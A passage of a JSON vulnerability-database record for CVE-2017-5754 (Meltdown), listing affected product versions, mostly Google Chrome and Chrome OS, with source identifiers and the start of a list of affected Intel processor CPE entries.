        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.307"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.127"
      },
      {
        "model": "chrome beta mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1027"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.396.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.428.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1035.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.767.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.891.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.460.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1001.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1053"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.455.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1014.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.220"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.210"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.449.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.142"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.620.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.497.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.576.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1015.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.213"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.2"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.148"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1682.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.99"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.751.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.636.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.313"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "65.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.64"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.456.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.12"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.47"
      },
      {
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.831.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.550.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.583.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.595.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1009"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.131"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.108"
      },
      {
        "model": "proliant dl385 gen10 server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.02"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.154.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.866.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1673.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.131"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.128"
      },
      {
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.653.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1656.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.35"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.713.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.643.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.228"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.144"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.5"
      },
      {
        "model": "bactec",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "9120/92400"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.504.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.767.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1292.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1058.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.129"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.218"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.68"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.359.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.205"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.565.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.567.0"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.37586"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.238"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.656.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1011"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1033.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.788.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.691.0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00303"
      },
      {
        "db": "BID",
        "id": "102378"
      },
      {
        "db": "BID",
        "id": "106128"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-001001"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5754"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3710:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3000:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3010:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3050:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2930:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2920:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2808:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2807:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3060:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1900:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3295rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3235rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3775:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2480:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3308:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3338:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3808:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2738:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2718:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2730:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3510:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n4000:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
